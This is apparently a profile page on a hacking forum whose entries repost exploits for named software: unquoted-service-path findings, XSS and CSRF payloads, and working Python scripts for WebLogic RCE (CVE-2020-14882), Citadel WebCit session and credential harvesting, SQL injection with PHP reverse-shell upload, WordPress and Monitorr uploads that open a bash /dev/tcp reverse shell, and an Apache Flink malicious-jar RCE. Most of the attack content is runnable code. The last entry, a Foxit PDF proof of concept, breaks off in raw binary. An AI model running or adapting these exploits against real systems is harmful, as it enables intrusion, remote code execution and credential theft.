Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Exploit - EPSON 1.124 - 'seksmdb.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: EPSON 1.124 - 'seksmdb.exe' Unquoted Service Path # Discovery by: İsmail Önder Kaya # Discovery Date: 2020-10-27 # Vendor Homepage: https://www.epson.co.uk/support?productID=10820&os=22#drivers_and_manuals # Tested Version: 1.124 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON_P2B" | findstr /i /v """ SEcnStatutsDatabase SENADB C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe Auto # Service info: C:\>sc qc SENADB [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SENADB TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : SEcnStatutsDatabase DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  2. HireHackking

    Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path # Date: 2020-8-25 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://www.gearboxcomputers.com/ # Software Link: https://www.gearboxcomputers.com/files/ProgramAccessController.exe # Version: 1.2.0.0 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc PACSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PACSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Program Access Controller\PACService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : PAC Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  3. HireHackking

    IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path # Date: 2020-8-25 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://www.gearboxcomputers.com/ # Software Link: https://www.gearboxcomputers.com/files/IPWatcherSetup.exe # Version: 3.0.0.30 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc IPWatcherSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IPWatcherSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\IP Watcher\IPWatcherService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IPWatcherService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  4. HireHackking

    Prey 1.9.6 - "CronService" Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Prey 1.9.6 - "CronService" Unquoted Service Path # Discovery by: Ömer Tuygun # Discovery Date:16.10.2020 # Vendor Homepage: https://preyproject.com/ # Software Link: https://preyproject.com/download/ # Tested Version: 1.9.6 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Description: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. C:\Users>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Prey" | findstr /i /v """ Cron Service CronService C:\Program Files (x86)\Prey\wpxsvc.exe Auto C:\Users>sc qc CronService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CronService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Prey\wpxsvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cron Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users>
  5. HireHackking

    Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Title: Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS) # Type: Reflected XSS # Software: Mailman # Version: >=1.x <= 2.1.23 # Vendor Homepage: https://www.list.org # Original link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950 # POC Author: Valerio Alessandroni # Date: 28/10/2020 # Description: Cross-site scripting (XSS) vulnerability in the web UI in Mailman before 2.1.26 allows remote attackers to inject arbitrary web script or HTML via a user-options URL. # # https://127.0.0.1/cgi-bin/mailman/options/[LIST]/[EMAIL][XSS] # Which [LIST] is a valid list, [EMAIL] is a valid email and [XSS] is the payload # # For this POC I used the following payload # CVE: CVE-2018-5950 "accesskey%3d"x"onclick%3d"alert`XSS`" # Due the payload is loaded inside an HIDDEN INPUT TYPE, until today the only way to trigger the malicious code is via the accesskey attribute. # An URL Encoded version of the payload is %22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22 # URL Example: https://127.0.0.1/cgi-bin/mailman/options/list_name/test@test.com%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22 # In order to trigger the alert, the victim has to press the following buttons ALT+SHIFT+X # where X is an arbitrary button inserted as accesskey attribute in the payload.
  6. HireHackking

    Online Examination System 1.0 - 'name' Stored Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online examination system 1.0 - 'name' Stored Cross Site Scripting # Date: 29/10/2020 # Exploit Author: Nikhil Kumar (https://www.linkedin.com/in/nikhil-kumar-4b9443166/) # Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php # Software Link: https://github.com/projectworldsofficial/online-examination-systen-in-php.git # Version: 1.0 # Tested On: Ubntu 18 + Xampp-linux-x64-5.5.38-3 Step 1: Open the URL http://localhost/online-examination-systen-in-php/index.php and fill the sign up form http://localhost/exam_system/sign.php?q=account.php Step 2 : Use payload ><script>alert(document.cookie)</script> in "name=" field Malicious Request ----------------- POST /exam_system/sign.php?q=account.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 157 Origin: http://localhost Connection: close Referer: http://localhost/exam_system/index.php Cookie: security_level=1; PHPSESSID=kue9gcj3bs2329e8mctsokaod7 Upgrade-Insecure-Requests: 1 name=test><script>alert(document.cookie)</script>&gender=M&college=test&email=test@test.com&mob=8888888888&password=123456&cpassword=123456 Step 3: Cookie will be reflected each time user logged in with their credentials
  7. HireHackking

    Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot # Date: 10/28/2020 # Exploit Author: Mohammed Farhan # Vendor Homepage: https://genexis.co.in/product/ont/ # Version: Platinum-4410 Software version - P4410-V2-1.28 # Tested on: Windows 10 # Author Contact: https://twitter.com/farhankn Vulnerability Details =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Login to the application Create an HTML file using the below mentioned code <html> <body> <script>history.pushState('', '', '/')</script> <form action=3D"http://192.168.1.1/cgi-bin/mag-reset.asp" method=3D"POS= T"> <input type=3D"hidden" name=3D"rebootflag" value=3D"1" /> <input type=3D"hidden" name=3D"restoreFlag" value=3D"1" /> <input type=3D"hidden" name=3D"isCUCSupport" value=3D"0" /> <input type=3D"submit" value=3D"Submit request" /> </form> </body> </html> Open the HTML page in the browser and Click on "Submit Request" Note that modem reboots after the same
  8. HireHackking

    WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python3 # Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request # Exploit Author: Nguyen Jang # CVE: CVE-2020-14882 # Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html # Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html # More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf import requests import sys from urllib3.exceptions import InsecureRequestWarning if len(sys.argv) != 3: print("[+] WebLogic Unauthenticated RCE via GET request") print("[+] Usage : python3 exploit.py http(s)://target:7001 command") print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"") print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"") exit() target = sys.argv[1] command = sys.argv[2] request = requests.session() headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'} print("[+] Sending GET Request ....") GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers) print("[+] Done !!")
  9. HireHackking

    CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting # Date: 30/10/2020 # Exploit Author: Vyshnav NK # Vendor Homepage: https://projectworlds.in/ # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip # Version: 1.0 # Tested on: Windows 10 and Windows 7 CSE Bookstore is vulnerable to a Persistent Cross-site scripting on Checkout.php and cartp.php, Where an user can able to add quantity as an XSS Payload and once added each time when we click on MyCart option it triggers as stored one The below URL can be accessed by a User URL : http://localhost/php/checkout.php and http://localhost/php/cart.php Payload : "><svg/onload=alert(5)> Insert XSS Payload into Quantity Section
  10. HireHackking

    Citadel WebCit < 926 - Session Hijacking Exploit

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Citadel WebCit < 926 - Session Hijacking Exploit # Exploit Author: Simone Quatrini # Version: 926 #!/usr/bin/env python3 import argparse import requests import time import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) parser = argparse.ArgumentParser(description="Webcit <= 926 Session Hijacking") parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8080/") parser.add_argument('--verbose', '-v', action='store_true', required=False, help="Shows the full response") args = parser.parse_args() url = args.url verbose = args.verbose def check_endpoint(url): headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'} response = requests.get(url+'/dotskip?room=_BASEROOM_', headers=headers, verify=False) if response.status_code == 200: print("[+] WebCit is reachable\n") else: print("\n[-] WebCit response code: ", response.status_code) sys.exit() def harvesting(url, verbose): #Current Timestamp epoch_time = int(time.time()) #harvesting technique only search for user that logged-in within the last ~20 minutes. #increase the search_back_in variable's number to search even backwards (it will require more time and requests) #Also, make sure that you're using the same timezone of the server search_back_in = 999 print("[/] Credential harvesting in progress...") while search_back_in > 0: payload = str(epoch_time-search_back_in)+'|||||' payload_hex = payload.encode(encoding='utf_8').hex() headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','Cookie':'webcit='+payload_hex+''} response = requests.get(url+'/dotskip?room=_BASEROOM_', headers=headers, verify=False) try: cookievalue = bytes.fromhex(response.cookies['webcit']) cookievalue = cookievalue.decode(encoding='utf_8') parts = cookievalue.split('|') if ((len(parts[1])) and (len(parts[2]))): print("Credential found: ", cookievalue) except: if(verbose): print("[-] Invalid returned cookie value not valid, skipping") search_back_in = search_back_in - 1 print("[+] Credential harvesting done.") # Default actions if only '--url' is passed check_endpoint(url) harvesting(url, verbose)
  11. HireHackking

    DedeCMS v.5.8 - "keyword" Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DedeCMS v.5.8 - "keyword" Cross-Site Scripting # Date: 2020-07-27 # Exploit Author: Noth # Vendor Homepage: https://github.com/dedetech/DedeCMSv5 # Software Link: https://github.com/dedetech/DedeCMSv5 # Version: v.5.8 # CVE : CVE-2020-27533 A Cross Site Scripting (XSS) issue was discovered in the search feature of DedeCMS v.5.8 that allows malicious users to inject code into web pages, and other users will be affected when viewing web pages. PoC : POST /DedeCMSv5-master/src/dede/action_search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 47 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/DedeCMSv5-master/src/dede/ Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=dgj9gs48q9nbrckdq0ei5grjd7; _csrf_name_7ac3ea0e=8a824367d97bb8f984d4af7a1ad11308; _csrf_name_7ac3ea0e__ckMd5=c692dd4f707ea756; DedeUserID=1; DedeUserID__ckMd5=7e44b1ee92d784aa; DedeLoginTime=1603530632; DedeLoginTime__ckMd5=69967c5a8db15fb4; dede_csrf_token=80866e4429220e784f2514d38de9a5ea; dede_csrf_token__ckMd5=de396c60d5d75d93 Upgrade-Insecure-Requests: 1 keyword="><script>alert(1)</script>
  12. HireHackking

    Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple College Website 1.0 - SQL Injection / Remote Code Execution # Date: 30-10-2020 # Exploit Author: yunaranyancat # Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip # Version: 1.0 # Tested on: Ubuntu 18.04 + XAMPP 7.4.11 # CVE ID : N/A # replace revshell.php with your own php reverse shell # change [TARGET URL] to target URL or IP address # setup your netcat listener for sum good ol shellz #!/usr/bin/python3 import requests import time def sqli_admin(): s = requests.Session() data = {"username":"admin' or 1=1#","password":"hacked"} adminlogin = "http://[TARGET URL]/college_website/admin/ajax.php?action=login" s.post(adminlogin,data=data) return s def trigger_rce(session): starttime = int(time.time()) multipart_form_data = { "name": ("College of Hackers"), "email": ("test@test.com"), "contact" : ("+11111111111"), "about" : ("Nothing much about it"), "img" : ("revshell.php", open("revshell.php", "rb")) } session.post("http://[TARGET URL]/alumni/admin/ajax.php?action=save_settings", files=multipart_form_data) get_shell(starttime-100,starttime+100,session) def get_shell(start,end,session): for i in range(start,end): session.get("http://[TARGET URL]/alumni/admin/assets/uploads/"+str(i)+"_revshell.php") def main(): session = sqli_admin() trigger_rce(session) if __name__ == '__main__': main()
  13. HireHackking

    Online Job Portal 1.0 - 'userid' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Job Portal 1.0 - 'userid' SQL Injection # Google Dork: N/A # Date: 2020/10/28 # Exploit Author: Akıner Kısa # Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip # Version: 1.0 # Tested on: XAMPP # CVE : N/A # Vulnerable URL: http://localhost/jobportal/Admin/EditUser.php?UserId=' Proof of Concept: 1. See vulnerable url. 2. Open sqlmap and use " sqlmap -u "http://localhost/jobportal/Admin/EditUser.php?UserId='" --dbs " command.
  14. HireHackking

    WordPress Plugin Simple File List 4.2.2 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python # -*- coding: utf-8 -*- # Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Arbitrary File Upload # Date: 2020-11-01 # Exploit Author: H4rk3nz0 based off exploit by coiffeur # Original Exploit: https://www.exploit-db.com/exploits/48349 # Vendor Homepage: https://simplefilelist.com/ # Software Link: https://wordpress.org/plugins/simple-file-list/ # Version: Wordpress v5.4 Simple File List v4.2.2 import requests import random import hashlib import sys import os import urllib3 urllib3.disable_warnings() dir_path = '/wp-content/uploads/simple-file-list/' upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php' move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php' def usage(): banner = """ NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL> AUTHOR: coiffeur """ print(banner) def generate(): filename = f'{random.randint(0, 10000)}.png' password = hashlib.md5(bytearray(random.getrandbits(8) for _ in range(20))).hexdigest() with open(f'{filename}', 'wb') as f: payload = '<?php passthru("bash -i >& /dev/tcp/192.168.1.1/4444 0>&1"); ?>' f.write(payload.encode()) print(f'[ ] File {filename} generated with password: {password}') return filename, password def upload(url, filename): files = {'file': (filename, open(filename, 'rb'), 'image/png')} datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path, 'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'} r = requests.post(url=f'{url}{upload_path}', data=datas, files=files, verify=False) r = requests.get(url=f'{url}{dir_path}{filename}', verify=False) if r.status_code == 200: print(f'[ ] File uploaded at {url}{dir_path}{filename}') os.remove(filename) else: print(f'[*] Failed to upload {filename}') exit(-1) return filename def move(url, filename): new_filename = f'{filename.split(".")[0]}.php' headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1', 'X-Requested-With': 'XMLHttpRequest'} datas = {'eeSFL_ID': 1, 'eeFileOld': filename, 'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'} r = requests.post(url=f'{url}{move_path}', data=datas, headers=headers, verify=False) if r.status_code == 200: print(f'[ ] File moved to {url}{dir_path}{new_filename}') else: print(f'[*] Failed to move {filename}') exit(-1) return new_filename def main(url): file_to_upload, password = generate() uploaded_file = upload(url, file_to_upload) moved_file = move(url, uploaded_file) if moved_file: print(f'[+] Exploit seem to work.\n[*] Confirmning ...') datas = {'password': password, 'cmd': 'phpinfo();'} r = requests.post(url=f'{url}{dir_path}{moved_file}', data=datas, verify=False) if r.status_code == 200 and r.text.find('php') != -1: print('[+] Exploit work !') print(f'\tURL: {url}{dir_path}{moved_file}') print(f'\tPassword: {password}') if __name__ == "__main__": if (len(sys.argv) < 2): usage() exit(-1) main(sys.argv[1])
  15. HireHackking

    Apache Flink 1.9.x - File Upload RCE (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # _*_ coding: utf-8 _*_ # Exploit Title: Apache Flink 1.9.x - File Upload RCE (Unauthenticated) # Google Dork: None # Date: 2020.11.01 # Exploit Author: bigger.wing # Vendor Homepage: https://flink.apache.org/ # Software Link: https://flink.apache.org/downloads.html # Version: 1.9.x # Tested on: Centos7.x, 1.9.1 # CVE: None import io import re import sys import base64 import requests class FlinkRCECheck: def __init__(self, url): self.url = url self.timeout = 10 self.upload_file = 'rce_check_from_sec.jar' self.headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/61.0 Safari/537.36' } @property def get_version(self): url = '%s/%s' % (self.url, 'config') try: res = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False) version = res.json().get('flink-version') except: version = 'unknown' return version @property def jar_check(self): url = '%s/%s' % (self.url, 'jars') jar_list = [] try: res = requests.get(url, headers=self.headers, verify=False, timeout=self.timeout) if res.status_code == 200 and 'application/json' in res.headers.get('Content-Type', ''): res = res.json() for file in res['files']: if file['id'].endswith(self.upload_file): jar_list.append(file['id']) except Exception as e: pass return jar_list @property def jar_upload(self): url = '%s/%s' % (self.url, 'jars/upload') jar_content = base64.b64decode('UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My' '0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALg' 'AAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAA' 'AAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAK' 'VkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz' '/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3' 'QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLv' 'CGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5' 'YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujC' 'QNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJN' 'aFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK' '6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Q' 'o0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs' '10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNM' 'KA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjo' 'RF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqp' 's0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJ' 'cVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEs' 'OJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6Ejpt' 'I4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IO' 'Yg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1b' 'U+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSw' 'ECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQ' 'AFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUG' 'AAAAAAMAAwC4AAAArgQAAAAA') files = {'jarfile': (self.upload_file, io.BytesIO(jar_content), 'application/octet-stream')} try: res = requests.post(url, headers=self.headers, files=files, timeout=self.timeout, verify=False) file_id = res.json()['filename'].split('/')[-1] return file_id except Exception as e: res = False return res @property # delete history jar packages def jar_delete(self): for jar_name in self.jar_check: url = '%s//jars/%s' % (self.url, jar_name) try: requests.delete(url=url, headers=self.headers, timeout=self.timeout, verify=False) except: pass return def rce(self, command): jar_file = self.jar_upload try: execute_cmd_url = '%s/jars/%s/run?entry-class=Execute&program-args="%s"' % (self.url, jar_file, command) res = requests.post(url=execute_cmd_url, headers=self.headers, timeout=self.timeout, verify=False) res = re.findall('\|@\|(.*?)\|@\|', res.text)[0][0:-2] if res: print('rce command "%s" exec result: %s' % (command, res)) state = 1 msg = '%s rce success' % self.url else: state = 0 msg = '%s rce failed' % self.url except: state = 0 msg = '%s rce failed' % self.url delete = self.jar_delete return {'state': state, 'version': self.get_version, 'msg': msg} if __name__ == '__main__': usage = 'python3 script.py ip port command' if len(sys.argv) != 4: print('simple usage: %s' % usage) else: ip = sys.argv[1] port = sys.argv[2] command = sys.argv[3] url = 'http://%s:%s' % (ip, port) res = FlinkRCECheck(url=url).rce(command=command) print(res)
  16. HireHackking

    Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python # -*- coding: UTF-8 -*- # Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated) # Date: September 12, 2020 # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ # Software Link: https://github.com/Monitorr/Monitorr # Version: 1.7.6m # Tested on: Ubuntu 19 import requests import os import sys if len (sys.argv) != 4: print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport") else: url = sys.argv[1] + "/assets/php/upload.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]} data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n" requests.post(url, headers=headers, data=data) print ("A shell script should be uploaded. Now we try to execute it") url = sys.argv[1] + "/assets/data/usrimg/she_ll.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} requests.get(url, headers=headers)
  17. HireHackking

    Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API) # Exploit Author: Nassim Asrir # Vendor Homepage: https://www.foxitsoftware.com/ # Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog. # CVE-2020-14425 The exploit process need the user-interaction (Opening the PDF) . + Process continuation #POC %PDF-1.4 %ÓôÌá 1 0 obj << /CreationDate(D:20200821171007+02'00') /Title(Hi, Can you see me ?) /Creator(AnonymousUser) >> endobj 2 0 obj << /Type/Catalog /Pages 3 0 R /Names << /JavaScript 10 0 R >> >> endobj 3 0 obj << /Type/Pages /Count 1 /Kids[4 0 R] >> endobj 4 0 obj << /Type/Page /MediaBox[0 0 595 842] /Parent 3 0 R /Contents 5 0 R /Resources << /ProcSet [/PDF/Text/ImageB/ImageC/ImageI] /ExtGState << /GS0 6 0 R >> /Font << /F0 8 0 R >> >> /Group << /CS/DeviceRGB /S/Transparency /I false /K false >> >> endobj 5 0 obj << /Length 94 /Filter/FlateDecode >> stream xœŠ»@@EûùŠ[RØk ­x•ÄüW"DDçëœâžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔÈŒ [ŽãB_5!d§ZhP>¯ ‰ 